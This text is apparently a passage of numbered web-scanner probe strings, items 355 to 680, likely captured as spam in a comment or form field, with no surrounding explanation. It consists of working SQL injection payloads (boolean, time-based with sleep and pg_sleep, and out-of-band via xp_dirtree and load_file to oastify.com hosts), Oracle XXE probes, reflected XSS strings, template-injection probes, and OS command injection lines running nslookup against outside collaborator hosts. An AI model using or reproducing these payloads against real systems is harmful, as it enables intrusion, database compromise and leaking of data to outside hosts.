  355. SUGRYQ’);declare @q varchar(99);set @q=’\\ojb2ygwemjhvz45a1gcqiij3uu0nodc45sxfn3c.oasti’+’fy.com\rhn’; exec master.dbo.xp_dirtree @q;–


  356. (select load_file(‘\\\\xdebspqngsb4tdzjvp6zcrdco3uwim6d810oqcf.oastify.com\\ulh’))


  357. SUGRYQ’+(select load_file(‘\\\\0fgeussqivd7vg1mxs82euffq6wzkp8gb43rtfi.oastify.com\\fmu’))+’


  358. 85594109′ or ‘5677’=’5677


  359. 45232720′ or ‘5303’=’5305


  360. 51510884′ or 7779=7779–


  361. 38124659′ or 9546=9550–


  362. ‘ and ‘1839’=’1839


  363. ‘ and ‘4260’=’4265


  364. SUGRYQ87954208′ or ‘1339’=’1339


  365. ‘ and 9967=9967–


  366. SUGRYQ11925740′ or ‘8031’=’8040


  367. ‘ and 5842=5848–


  368. p36avw34j8


  369. (select extractvalue(xmltype(‘<!DOCTYPE root [ %sawty;]>’),’/l’) from dual)


  370. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %sawty;]>’),’/l’) from dual)||’


  371. ;declare @q varchar(99);set @q=’\\m0n0fedc3hytg2m8ietozg01bshl5it9jxbk18q.oasti’+’fy.com\hfh’; exec master.dbo.xp_dirtree @q;–


  372. ‘;declare @q varchar(99);set @q=’\\ehzsw6u4k9flxu30z6agg8htskydmaa11ptcj08.oasti’+’fy.com\rty’; exec master.dbo.xp_dirtree @q;–


  373. );declare @q varchar(99);set @q=’\\0ste7s5qvvq78gemasl2rusf369zxwlndb5yvmk.oasti’+’fy.com\bfr’; exec master.dbo.xp_dirtree @q;–


  374. ‘);declare @q varchar(99);set @q=’\\5pvj4x2vs0nc5lbr7xi7ozpk0b64u1isbg33tri.oasti’+’fy.com\wkh’; exec master.dbo.xp_dirtree @q;–


  375. (select load_file(‘\\\\zwzdbr9pzuu6cfilerp1vtwe75dy1vpmrajx9ly.oastify.com\\nye’))


  376. ‘+(select load_file(‘\\\\g8pun8l6bb6nowu2q81i7a8vjmpfdc134rwem2b.oastify.com\\nva’))+’


  377. (select extractvalue(xmltype(‘<!DOCTYPE root [ %axnwn;]>’),’/l’) from dual)


  378. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %axnwn;]>’),’/l’) from dual)||’


  379. SUGRYQ;declare @q varchar(99);set @q=’\\277gmuksax59nitopu046w7hi8o1cr0iq6it8hx.oasti’+’fy.com\dgv’; exec master.dbo.xp_dirtree @q;–


  380. SUGRYQ’;declare @q varchar(99);set @q=’\\adros2q0g5bhtqzwv26cc4dpogu9iz6qxep1fp4.oasti’+’fy.com\dyl’; exec master.dbo.xp_dirtree @q;–


  381. SUGRYQ);declare @q varchar(99);set @q=’\\nvm1af8dyitub3h9dfopuhv26tcm0co3gr8ey2n.oasti’+’fy.com\sht’; exec master.dbo.xp_dirtree @q;–


  382. SUGRYQ’);declare @q varchar(99);set @q=’\\ld2zsdqbggbst1z7vd6ncfd0orukia61zprch06.oasti’+’fy.com\xej’; exec master.dbo.xp_dirtree @q;–


  383. (select load_file(‘\\\\ixjwcaa80dvpdyj4faqkwcxx8oeh27qysmk9axz.oastify.com\\ohx’))


  384. 93866365′ or ‘9500’=’9500


  385. SUGRYQ’+(select load_file(‘\\\\w30aiogm6r13jcpilowy2q3be2kv8lwcz0rnhb6.oastify.com\\bcp’))+’


  386. 18515035′ or ‘1574’=’1578


  387. 21353351′ or ‘3960’=’3960


  388. 45573302′ or ‘6830’=’6830′


  389. 63467210′ or 7463=7463–


  390. 34078472′ or 7497=7504–


  391. 17249210′ or 1093=1093–


  392. 58837684′ or 5102=5102′–


  393. ‘ and ‘9712’=’9712


  394. ‘ and ‘9796’=’9797


  395. ‘ and ‘9754’=’9754


  396. ‘ and ‘6227’=’6227′


  397. ‘ and 2760=2760–


  398. SUGRYQ19590710′ or ‘6341’=’6341


  399. ‘ and 9064=9071–


  400. SUGRYQ43960951′ or ‘4891’=’4893


  401. ‘ and 3431=3431–


  402. SUGRYQ41714390′ or ‘4524’=’4524


  403. ‘ and 2809=2809’–


  404. SUGRYQ92935537′ or ‘3948’=’3948′


  405. hj2ftndq9b


  406. j6u5fvsny7v35er4ogyg


  407. jkfzoc7znt%41edmv1umy12


  408. muubjdrz65\\lwxyaedind


  409. xjz9ktxt25Akmm481f7oq


  410. ffuuhalert(1)osjxc


  411. ffuuh%3cscript%3ealert%281%29%3c%2fscript%3eosjxc


  412. m33mxalert(1)px7if


  413. m33mx%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3epx7if


  414. zwxf2%3ca%20b%3dc%3eplf5y


  415. (select extractvalue(xmltype(‘<!DOCTYPE root [ %ugbnv;]>’),’/l’) from dual)


  416. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %ugbnv;]>’),’/l’) from dual)||’


  417. ;declare @q varchar(99);set @q=’\\8ajmp0nyd38fqowus03a92anler7f43vtjl6bu0.oasti’+’fy.com\fkz’; exec master.dbo.xp_dirtree @q;–


  418. ‘;declare @q varchar(99);set @q=’\\7v3laz8xy2tebnhtdzo9u1vm6dc603oufi75xtm.oasti’+’fy.com\qxr’; exec master.dbo.xp_dirtree @q;–


  419. );declare @q varchar(99);set @q=’\\dzgre5c328xkftlzh5sfy7zsajgc49s0kocb2zr.oasti’+’fy.com\xqz’; exec master.dbo.xp_dirtree @q;–


  420. ‘);declare @q varchar(99);set @q=’\\zfidurspiud6vf1lxr81etfeq5wykv8m1atxjl8.oasti’+’fy.com\ssr’; exec master.dbo.xp_dirtree @q;–


  421. (select load_file(‘\\\\lwlzbd9bzgusc1i7edpnvfw07rdk1hp8rwjj97y.oastify.com\\tgq’))


  422. ‘+(select load_file(‘\\\\sfb6uksiindzv81exk8uemf7qywrko8fb33qtei.oastify.com\\vcn’))+’


  423. 19566369′ or ‘9326’=’9326


  424. 16520297′ or ‘5319’=’5323


  425. SUGRYQth8ez%3cscript%3ealert%281%29%3c%2fscript%3eo55gq


  426. 66001821′ or ‘7831’=’7831


  427. 78030390′ or ‘3598’=’3598′


  428. 21073692′ or 9455=9455–


  429. SUGRYQj7vz4%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3euj2ys


  430. 75546547′ or 3688=3691–


  431. 74860678′ or 3683=3683–


  432. 87626612′ or 4843=4843′–


  433. ‘ and ‘6514’=’6514


  434. ‘ and ‘2752’=’2759


  435. ‘ and ‘9737’=’9737


  436. ‘ and ‘3146’=’3146′


  437. (select extractvalue(xmltype(‘<!DOCTYPE root [ %wcppj;]>’),’/l’) from dual)


  438. ‘ and 4846=4846–


  439. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %wcppj;]>’),’/l’) from dual)||’


  440. ‘ and 7935=7942–


  441. SUGRYQ;declare @q varchar(99);set @q=’\\z11dgrep4uz6hfnljru10t1ec5iy6oufk3cq2er.oasti’+’fy.com\yxx’; exec master.dbo.xp_dirtree @q;–


  442. ‘ and 8581=8581–


  443. SUGRYQ’;declare @q varchar(99);set @q=’\\q4v4jihg7l2xk6qcmixs3k45fwlp9fx6ough65v.oasti’+’fy.com\wat’; exec master.dbo.xp_dirtree @q;–


  444. ‘ and 3708=3708’–


  445. SUGRYQ);declare @q varchar(99);set @q=’\\6dkksyqwg1bdtmzsvy68c0dlocu5iv6myaqxgl5.oasti’+’fy.com\lns’; exec master.dbo.xp_dirtree @q;–


  446. SUGRYQ’);declare @q varchar(99);set @q=’\\j3nxibg96e1qjzp5lbwl2d3yepki88wzpnha7yw.oasti’+’fy.com\gfu’; exec master.dbo.xp_dirtree @q;–


  447. (select load_file(‘\\\\wkkazoxmnri30c6i2odyjqkbv21vpldcf07nxbm.oastify.com\\nzq’))


  448. 6h8brpg107


  449. SUGRYQ’+(select load_file(‘\\\\97enm1kza45gnptvp10b637oifo8cy0p3dv0loa.oastify.com\\bzl’))+’


  450. x6mbvlyauf962slgcti9


  451. h3pztdj7uw%41ttrv4c8fko


  452. 55navsclrq\\lp8uyqtisv


  453. yggmv6v364Acl3arn0eqz


  454. alert%281%29


  455. confirm(1)


  456. h3muijmhhd


  457. SUGRYQ56540016′ or ‘8073’=’8073


  458. SUGRYQ74278771′ or ‘1220’=’1228


  459. h3mui%3ca%20xmlns%3aa%3d%27http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%27%3e%3ca%3abody%20onload%3d%27confirm%281%29%27%2f%3e%3c%2fa%3ejmhhd


  460. SUGRYQ22785760′ or ‘8210’=’8210


  461. udrgyost6h


  462. SUGRYQ19092669′ or ‘4127’=’4127′


  463. udrgy%3ca%20xmlns%3aa%3d%22http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%22%3e%3ca%3abody%20onload%3d%22confirm%281%29%22%2f%3e%3c%2fa%3eost6h


  464. (select extractvalue(xmltype(‘<!DOCTYPE root [ %gttav;]>’),’/l’) from dual)


  465. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %gttav;]>’),’/l’) from dual)||’


  466. ;declare @q varchar(99);set @q=’\\v2y9hnfl5q02ibohknvx1p2ad1ju7rvil6dt3hs.oasti’+’fy.com\smq’; exec master.dbo.xp_dirtree @q;–


  467. ‘;declare @q varchar(99);set @q=’\\j4oxjbh97e2qkzq5mbxl3d4yfpli9fx6ough65v.oasti’+’fy.com\olt’; exec master.dbo.xp_dirtree @q;–


  468. );declare @q varchar(99);set @q=’\\b1dpg3e146zihrnxj3ud051qchia67uymme94xt.oasti’+’fy.com\fhq’; exec master.dbo.xp_dirtree @q;–


  469. ‘);declare @q varchar(99);set @q=’\\9aknp1nzd48gqpwvs13b93aolfr8f53wwko7ev3.oasti’+’fy.com\feb’; exec master.dbo.xp_dirtree @q;–


  470. (select load_file(‘\\\\3fjhuvstiydavj1pxv85exfiq9w2kz8qae21sph.oastify.com\\utt’))


  471. ‘+(select load_file(‘\\\\aiwox2v0l5ghyq4w02bch4iptgz9n6bxel68wwl.oastify.com\\bql’))+’


  472. SUGRYQsxso6%3ca%20xmlns%3aa%3d%27http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%27%3e%3ca%3abody%20onload%3d%27confirm%281%29%27%2f%3e%3c%2fa%3edj07j


  473. SUGRYQbxyxx%3ca%20xmlns%3aa%3d%22http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%22%3e%3ca%3abody%20onload%3d%22confirm%281%29%22%2f%3e%3c%2fa%3edothw


  474. (select extractvalue(xmltype(‘<!DOCTYPE root [ %hlccf;]>’),’/l’) from dual)


  475. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %hlccf;]>’),’/l’) from dual)||’


  476. SUGRYQ;declare @q varchar(99);set @q=’\\uig8xmvklpg1ya4g0mbwhoi9t0ztnjba1ytlj98.oasti’+’fy.com\egr’; exec master.dbo.xp_dirtree @q;–


  477. 21951306′ or ‘9933’=’9933


  478. SUGRYQ’;declare @q varchar(99);set @q=’\\8y7md0by13wfeokug0rax2yn9ef73xroicaz0np.oasti’+’fy.com\okr’; exec master.dbo.xp_dirtree @q;–


  479. 86566601′ or ‘3517’=’3525


  480. 35716197′ or ‘4043’=’4043


  481. SUGRYQ);declare @q varchar(99);set @q=’\\301hfvdt3yyagjmpivt5zx0ib9h25stjl7du3is.oasti’+’fy.com\ubl’; exec master.dbo.xp_dirtree @q;–


  482. 17306727′ or ‘3505’=’3505′


  483. SUGRYQ’);declare @q varchar(99);set @q=’\\n6u1lfjd9i4um3s9ofzp5h62htnmbcz3srkea2z.oasti’+’fy.com\hjs’; exec master.dbo.xp_dirtree @q;–


  484. 81341254′ or 5022=5022–


  485. (select load_file(‘\\\\dl2r05y3o8jk1t7z35efk7lswj2cq2etgh84ysn.oastify.com\\ngl’))


  486. 36411219′ or 4091=4095–


  487. SUGRYQ’+(select load_file(‘\\\\424ihwfu5z0bikoqkwv61y2jdaj37tvky8qvgj5.oastify.com\\amo’))+’


  488. 44723427′ or 8407=8407–


  489. 84647654′ or 4202=4202′–


  490. ‘ and ‘1316’=’1316


  491. ‘ and ‘9641’=’9642


  492. ‘ and ‘9780’=’9780


  493. ‘ and ‘8369’=’8369′


  494. (select extractvalue(xmltype(‘<!DOCTYPE root [ %upovm;]>’),’/l’) from dual)


  495. ‘ and 6241=6241–


  496. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %upovm;]>’),’/l’) from dual)||’


  497. ‘ and 6984=6987–


  498. SUGRYQ;declare @q varchar(99);set @q=’\\ceuqt4r2h7cjus0yw47ed6erpivbj17sxgp3fr4.oasti’+’fy.com\iee’; exec master.dbo.xp_dirtree @q;–


  499. ‘ and 4291=4291–


  500. ‘ and 6821=6821’–


  501. SUGRYQ’;declare @q varchar(99);set @q=’\\qhb4wiugklfxx63cziasgkh5swypmfa61uthj58.oasti’+’fy.com\wwj’; exec master.dbo.xp_dirtree @q;–


  502. SUGRYQ);declare @q varchar(99);set @q=’\\vkj9znxlnqi20b6h2ndxjpkav11upkdb5zxmnac.oasti’+’fy.com\idg’; exec master.dbo.xp_dirtree @q;–


  503. SUGRYQ’);declare @q varchar(99);set @q=’\\oqi25g3etjov64ca8gjqpiq31u7nvdj4cs4fu3j.oasti’+’fy.com\gym’; exec master.dbo.xp_dirtree @q;–


  504. (select load_file(‘\\\\x31bipgn6s14jdpjlpwz2r3ce3kw8mwdy1qogc5.oastify.com\\sat’))


  505. b9mawrmzac


  506. SUGRYQ’+(select load_file(‘\\\\8z8me0cy23xffoluh0say2znaeg74xsovcnzdn2.oastify.com\\jpt’))+’


  507. lr69tvs2wg8kphl7emg0


  508. w5wffeereb%41sznd1lv9w2


  509. nvx5koslpw\\lz1zylfxx6


  510. (select extractvalue(xmltype(‘<!DOCTYPE root [ %nplww;]>’),’/l’) from dual)


  511. vfyguihu15Ag557im46b3


  512. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %nplww;]>’),’/l’) from dual)||’


  513. SUGRYQ;declare @q varchar(99);set @q=’\\kk8yzcxanfir00662cdmjekzvq1jp9d03ovblza.oasti’+’fy.com\ihm’; exec master.dbo.xp_dirtree @q;–


  514. btkckalert(1)g2hij


  515. SUGRYQ’;declare @q varchar(99);set @q=’\\5djjsxqvg0bctlzrvx67czdkobu4iu6lx9pwfk4.oasti’+’fy.com\uyp’; exec master.dbo.xp_dirtree @q;–


  516. btkck%3cscript%3ealert%281%29%3c%2fscript%3eg2hij


  517. SUGRYQ);declare @q varchar(99);set @q=’\\187fntlrbw68ohunqt137v8gj7p0dq1ht5lsbg0.oasti’+’fy.com\fiv’; exec master.dbo.xp_dirtree @q;–


  518. wby6ualert(1)qi0a4


  519. SUGRYQ’);declare @q varchar(99);set @q=’\\czfqe4c227xjfslyh4sey6zraigb41sslgd33rs.oasti’+’fy.com\thz’; exec master.dbo.xp_dirtree @q;–


  520. (select load_file(‘\\\\ykmczqxonti50e6k2qd0jskdv41xpndef27pxdm.oastify.com\\pfi’))


  521. wby6u%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3eqi0a4


  522. SUGRYQ’+(select load_file(‘\\\\caqqp4n2d78jqswys43e96arlirbf13s6gy3ord.oastify.com\\ock’))+’


  523. khf1s%3ca%20b%3dc%3elheg4


  524. (select extractvalue(xmltype(‘<!DOCTYPE root [ %fymyv;]>’),’/l’) from dual)


  525. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %fymyv;]>’),’/l’) from dual)||’


  526. ;declare @q varchar(99);set @q=’\\1qsf5t3rtwo86hcn8tj3pvqg1770vxjo9c1zrng.oasti’+’fy.com\tna’; exec master.dbo.xp_dirtree @q;–


  527. (select extractvalue(xmltype(‘<!DOCTYPE root [ %swqci;]>’),’/l’) from dual)


  528. ‘;declare @q varchar(99);set @q=’\\5rxj6x4vu0pc7ldr9xk7qzrk2b84w1ksbg33tri.oasti’+’fy.com\inj’; exec master.dbo.xp_dirtree @q;–


  529. );declare @q varchar(99);set @q=’\\299goumscx79pivoru248w9hk8q1ey2pudm0co1.oasti’+’fy.com\otd’; exec master.dbo.xp_dirtree @q;–


  530. ‘);declare @q varchar(99);set @q=’\\266glujs9x49misoouz45w6hh8n1byzpsdk0aoz.oasti’+’fy.com\hwz’; exec master.dbo.xp_dirtree @q;–


  531. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %swqci;]>’),’/l’) from dual)||’


  532. (select load_file(‘\\\\jczxrbp9feaqszy5ub5lbdcynptihf567uzhp5e.oastify.com\\agn’))


  533. ‘+(select load_file(‘\\\\wiiaxovmlrg3yc4i0obyhqibt2zvnsbje76uwil.oastify.com\\drr’))+’


  534. SUGRYQ;declare @q varchar(99);set @q=’\\fi1tx7v5lagmyv4107bhh9iutlzen4bv1jt6ju8.oasti’+’fy.com\kis’; exec master.dbo.xp_dirtree @q;–


  535. SUGRYQ’;declare @q varchar(99);set @q=’\\356hkvit8y3aljrpnvy54x5ig9m2asyjp7hu7iw.oasti’+’fy.com\qnw’; exec master.dbo.xp_dirtree @q;–


  536. 54746713′ or ‘8307’=’8307


  537. 94679638′ or ‘2218’=’2224


  538. 16677016′ or ‘2232’=’2232


  539. SUGRYQ);declare @q varchar(99);set @q=’\\0wxebs9qzvu7cgimesp2vuwf76dz1ppgh49rzfo.oasti’+’fy.com\wjt’; exec master.dbo.xp_dirtree @q;–


  540. 51665762′ or ‘2280’=’2280′


  541. 90021361′ or 1514=1514–


  542. 48554720′ or 9160=9162–


  543. 97494126′ or 6475=6475–


  544. SUGRYQ’);declare @q varchar(99);set @q=’\\vji9ynwlmqh2zb5h1ncxipjau10uokcb5zxmnac.oasti’+’fy.com\ziz’; exec master.dbo.xp_dirtree @q;–


  545. 46805638′ or 2043=2043′–


  546. ‘ and ‘8050’=’8050


  547. ‘ and ‘4593’=’4601


  548. (select load_file(‘\\\\unl82m0kqpl13a9g5mgwmon9y04tsjgaiyal09p.oastify.com\\zwh’))


  549. ‘ and ‘3838’=’3838


  550. ‘ and ‘1684’=’1684′


  551. ‘ and 7734=7734–


  552. SUGRYQ’+(select load_file(‘\\\\ehzsw6u4k9flxu30z6agg8htskydm3audi55vtk.oastify.com\\mvo’))+’


  553. ‘ and 3552=3555–


  554. ‘ and 2538=2538–


  555. ‘ and 4417=4417’–


  556. tqw5gmv5dj


  557. kez174e65rsgqev3e23o


  558. as6fcfqfkt%41db3g8tqo9a


  559. 38nza655j1\\lzliqd3t7p


  560. p2xbzrk9jbAhdn3vnibfv


  561. (select extractvalue(xmltype(‘<!DOCTYPE root [ %yurlf;]>’),’/l’) from dual)


  562. confirm%281%29


  563. prompt(1)


  564. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %yurlf;]>’),’/l’) from dual)||’


  565. dem8sjphnc


  566. dem8s%3ca%20xmlns%3aa%3d%27http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%27%3e%3ca%3abody%20onload%3d%27prompt%281%29%27%2f%3e%3c%2fa%3ejphnc


  567. SUGRYQ;declare @q varchar(99);set @q=’\\t1v7glej4oz0h9nfjluv0n18czis6iu9kxck28r.oasti’+’fy.com\ftn’; exec master.dbo.xp_dirtree @q;–


  568. h5u4sefdw0


  569. h5u4s%3ca%20xmlns%3aa%3d%22http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%22%3e%3ca%3abody%20onload%3d%22prompt%281%29%22%2f%3e%3c%2fa%3eefdw0


  570. SUGRYQ’;declare @q varchar(99);set @q=’\\smi61kzipnkz288e4kfulmm7xy3rrhf86wyjo7d.oasti’+’fy.com\jgq’; exec master.dbo.xp_dirtree @q;–


  571. SUGRYQ);declare @q varchar(99);set @q=’\\u728mmkkap51natgpm0w6o79i0otcj0asykla9z.oasti’+’fy.com\zth’; exec master.dbo.xp_dirtree @q;–


  572. SUGRYQ’);declare @q varchar(99);set @q=’\\0ste7s5qvvq78gemasl2rusf369zxplge46rwfl.oasti’+’fy.com\yon’; exec master.dbo.xp_dirtree @q;–


  573. (select load_file(‘\\\\qlf40iygoljx167c3ieskkl5ww2pqfe6gu8hy5n.oastify.com\\nej’))


  574. SUGRYQ’+(select load_file(‘\\\\mrh06e4cuhpt72d89ekoqgr12s8lwbk2nqfd51u.oastify.com\\wmu’))+’


  575. (select extractvalue(xmltype(‘<!DOCTYPE root [ %iqydg;]>’),’/l’) from dual)


  576. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %iqydg;]>’),’/l’) from dual)||’


  577. SUGRYQ;declare @q varchar(99);set @q=’\\qf94uisgildxv61cxi8sekf5qwwpkf86yuqhg55.oasti’+’fy.com\fqv’; exec master.dbo.xp_dirtree @q;–


  578. SUGRYQ’;declare @q varchar(99);set @q=’\\gp9u4826sbnn5wb278iioapv0m6fu5iw9k17rvg.oasti’+’fy.com\wrw’; exec master.dbo.xp_dirtree @q;–


  579. SUGRYQ);declare @q varchar(99);set @q=’\\301hfvdt3yyagjmpivt5zx0ib9h25stjl7du3is.oasti’+’fy.com\ldp’; exec master.dbo.xp_dirtree @q;–


  580. SUGRYQ’);declare @q varchar(99);set @q=’\\0cderspqfva7sgymus52bucfn6tzhp5gy4qrgf5.oasti’+’fy.com\jla’; exec master.dbo.xp_dirtree @q;–


  581. (select load_file(‘\\\\havvp9n7dc8oqxw3s93j9bawlnrgf63x5lx8nwc.oastify.com\\ihk’))


  582. SUGRYQ’+(select load_file(‘\\\\k3oyicga6f1rj0p6lcwm2e3zeqkj89w0zorbhz6.oastify.com\\uwa’))+’


  583. (select extractvalue(xmltype(‘<!DOCTYPE root [ %zhsep;]>’),’/l’) from dual)


  584. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %zhsep;]>’),’/l’) from dual)||’


  585. SUGRYQ;declare @q varchar(99);set @q=’\\srn66k4iunpz78de9kkuqmr72y8rwhk8aw2js7h.oasti’+’fy.com\pmg’; exec master.dbo.xp_dirtree @q;–


  586. SUGRYQ’;declare @q varchar(99);set @q=’\\zhkdwrupkuf6xf3lzra1gthes5yymoaf13tqje8.oasti’+’fy.com\ttv’; exec master.dbo.xp_dirtree @q;–


  587. SUGRYQ);declare @q varchar(99);set @q=’\\9y8nd1bz14wgepkvg1rbx3yo9ff83yrpjdb01oq.oasti’+’fy.com\zrf’; exec master.dbo.xp_dirtree @q;–


  588. SUGRYQ’);declare @q varchar(99);set @q=’\\0jkeyswqmvh7zg5m1sc2iujfu60zopcg54xrnfc.oasti’+’fy.com\ntp’; exec master.dbo.xp_dirtree @q;–


  589. (select load_file(‘\\\\ciyqx4v2l7gjys4y04beh6irtizbn1bsdg53vrk.oastify.com\\lxk’))


  590. SUGRYQ’+(select load_file(‘\\\\wtta8o6mwrr39cfibomysqtb42avylmcp0hn7bw.oastify.com\\rsb’))+’


  591. SUGRYQ35474681′ or ‘4220’=’4220


  592. SUGRYQ23579235′ or ‘1070’=’1078


  593. SUGRYQ53604903′ or ‘9038’=’9038


  594. SUGRYQ46800406′ or ‘6287’=’6287′


  595. SUGRYQtn53o%3cscript%3ealert%281%29%3c%2fscript%3em1fdp


  596. SUGRYQcojw9%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3eexo94


  597. (select extractvalue(xmltype(‘<!DOCTYPE root [ %jqhar;]>’),’/l’) from dual)


  598. SUGRYQ’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %jqhar;]>’),’/l’) from dual)||’


  599. SUGRYQ;declare @q varchar(99);set @q=’\\yvxcaq8oytt5behkdqo0usvd64cx0noee26pwdl.oasti’+’fy.com\pwx’; exec master.dbo.xp_dirtree @q;–


  600. SUGRYQ’;declare @q varchar(99);set @q=’\\k1mygcea4fzrh0n6jcum0e1zcqij69u0lodb3zs.oasti’+’fy.com\sgd’; exec master.dbo.xp_dirtree @q;–


  601. SUGRYQ);declare @q varchar(99);set @q=’\\jbyxqbo9ee9qrzx5tb4ladbympsig84zwnoaey3.oasti’+’fy.com\tcl’; exec master.dbo.xp_dirtree @q;–


  602. SUGRYQ’);declare @q varchar(99);set @q=’\\fxgtc7a50avmdvj1f7qhw9xu8lee24qvjjb61uq.oasti’+’fy.com\dgs’; exec master.dbo.xp_dirtree @q;–


  603. (select load_file(‘\\\\mka0zexcnhit02682edojgk1vs1lpbd2fq7dx1m.oastify.com\\icj’))


  604. SUGRYQ’+(select load_file(‘\\\\00yefsdq3vy7ggmmist2zu0fb6hz5ptgw4oref3.oastify.com\\jjm’))+’


  605. SUGRYQ13918455′ or ‘9460’=’9460


  606. SUGRYQ41127247′ or ‘9294’=’9296


  607. SUGRYQ39893862′ or ‘9981’=’9981


  608. SUGRYQ15754179′ or ‘1047’=’1047′


  609. SUGRYQm56pw%3ca%20xmlns%3aa%3d%27http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%27%3e%3ca%3abody%20onload%3d%27prompt%281%29%27%2f%3e%3c%2fa%3ejotmf


  610. SUGRYQjgyd1%3ca%20xmlns%3aa%3d%22http%3a%2f%2fwww%2ew3%2eorg%2f1999%2fxhtml%22%3e%3ca%3abody%20onload%3d%22prompt%281%29%22%2f%3e%3c%2fa%3ehewf4


  611. ‘”>


  612. javascript:/*


  613. 5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z


  614. 5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z


  615. 5550pWR8OHS’; waitfor delay ‘0:0:15’ —


  616. 555-1) OR 737=(SELECT 737 FROM PG_SLEEP(15))–


  617. 555O4wRK0CT’) OR 185=(SELECT 185 FROM PG_SLEEP(15))–


  618. 555yfYposaE’)) OR 194=(SELECT 194 FROM PG_SLEEP(15))–


  619. 555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),4.455)


  620. 555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’


  621. 2nbyuKchWGds8jExXkwxoOUoQwt


  622. 2p8gW8U36wqQWK1x9qEjBFVuhWb


  623. (select extractvalue(xmltype(‘<!DOCTYPE root [ %oenri;]>’),’/l’) from dual)


  624. ‘||(select extractvalue(xmltype(‘<!DOCTYPE root [ %oenri;]>’),’/l’) from dual)||’


  625. ;declare @q varchar(99);set @q=’\\hl6i4qs70ojoy661nebh996hb8h15rtij6bt1hq.oasti’+’fy.com\bov’; exec master.dbo.xp_dirtree @q;–


  626. ‘;declare @q varchar(99);set @q=’\\m9wnsvgcot7tmbu6bjzmxeumzd56twhn8b0yqmf.oasti’+’fy.com\sgx’; exec master.dbo.xp_dirtree @q;–


  627. );declare @q varchar(99);set @q=’\\od5pwxkesvbvqdy8fl3o1gyo3f98xylpdd50vok.oasti’+’fy.com\edb’; exec master.dbo.xp_dirtree @q;–


  628. ‘);declare @q varchar(99);set @q=’\\z220l89ph606fonj4wszqrnzsqyjm9a03ovblza.oasti’+’fy.com\jwp’; exec master.dbo.xp_dirtree @q;–


  629. (select load_file(‘\\\\ccsdvlj2rjajp1xwe92c04xc238wwmkdm1eo4ct.oastify.com\\anw’))


  630. ‘+(select load_file(‘\\\\w74xq5emm353klsg9txwvoswxn3gr6fxila80wp.oastify.com\\exa’))+’


  631. 59608867′ or ‘8649’=’8649


  632. 61086204′ or ‘6506’=’6515


  633. 98827340′ or ‘3011’=’3011


  634. 42177385′ or ‘7217’=’7217′


  635. 47847764′ or 9591=9591–


  636. 41192723′ or 9983=9985–


  637. 14265776′ or 7764=7764–


  638. 85579678′ or 6578=6578′–


  639. ‘ and ‘7670’=’7670


  640. ‘ and ‘1333’=’1341


  641. ‘ and ‘8006’=’8006


  642. ‘ and ‘8723’=’8723′


  643. ‘ and 4050=4050–


  644. ‘ and 7273=7274–


  645. ‘ and 3134=3134–


  646. ‘ and 7616=7616’–


  647. ortt73r3xt


  648. prompt%281%29


  649. s1x06prompt(1)waqti


  650. s1x06%3cscript%3eprompt%281%29%3c%2fscript%3ewaqti


  651. m1bb2prompt(1)uzv0v


  652. m1bb2%3cScRiPt%3eprompt%281%29%3c%2fScRiPt%3euzv0v


  653. gkiqr%3ca%20b%3dc%3ewnwy9


  654. pz8cy${442*353}j9kvg


  655. mw0cj{{257*489}}nrstm


  656. q8bqp#{300*806}hmw56


  657. wg3d5[[997*534]]nhxx3


  658. bcpzl${file.separator}z8vld


  659. l9jh5%{513*448}n4dvn


  660. gem3i{{583|add:989}}aa9ub


  661. #set ($a=877*311) dbhfs${a}nwbrs


  662. hrlwmd82h6


  663. dseb1
    = 137*857


  664. zl721{{.}}ttf17{{..}}lhng0


  665. lwu85__${881*793}__nczms


  666. }}f5uj6’/”<aq67m


  667. %}m9dss’/”<dbgxw


  668. fyyqo%>sa152’/”<zdok9


  669. 3owrgejp95995mfn0ihr


  670. aengghj4i9%413lidogtxbx


  671. h1m2ejboak\\l2k21z89f1


  672. 2o06fcl6sqAlnw6fy0kd8


  673. vcbwv4jlr2a2pkxfes2v0nxv2m8fw5kx8pvfj4.oastify.com


  674. nslookup -q=cname fo7g7ov53mmm149zqcefc79fe6kz8pwiz6rthh6.oastify.com.&


  675. |nslookup -q=cname zux0d81p96s67ofjwwkzirfzkqqje925qxdn1c.oastify.com.&


  676. ‘”`0&nslookup -q=cname lshmbuzb7sqs5ad5uiilgddlico5cv0sokbazz.oastify.com.&`’


  677. &nslookup -q=cname urpva3yk61p14jcetrhufmcuhlneb4zznrahy6.oastify.com.&’\”`0&nslookup -q=cname urpva3yk61p14jcetrhufmcuhlneb4zznrahy6.oastify.com.&`’


  678. |echo maimb44o6o 460u4uaigs||a #’ |echo maimb44o6o 460u4uaigs||a #|” |echo maimb44o6o 460u4uaigs||a #


  679. &echo dsw718jf6s h4kvoljk7g&


  680. “|echo 5clksftpa5 a8qoci9hfq ||


